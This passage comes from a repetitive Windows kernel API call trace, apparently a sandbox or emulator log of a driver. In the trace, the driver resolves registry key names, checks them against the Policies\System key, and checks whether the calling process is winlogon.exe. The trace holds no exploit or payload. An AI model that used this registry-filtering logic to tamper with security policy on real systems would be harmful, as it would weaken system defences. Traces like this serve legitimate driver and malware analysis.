| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xda, ret_val_ptr_out = 0xffffe0003a76faa0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xd8, ret_val_ptr_out = 0xffffe0003a782bd0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0xd8, ObjectNameInfo_unk_out = 0xffffe0003a782bd0, ReturnLength_ptr_out = 0xffffd00029344c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, DestinationString_out = \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a782bd0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesEngineThrottling, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a76faa0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003f9fb180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003f9fb5d0 | ||||
| _stricmp | _Str1 = OfficeClickToR, _Str2 = winlogon.exe, ret_val_out = -8 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8b2eae0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b8b2eae0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029344fb8, ret_val_out = 0xc0000004 | ||||
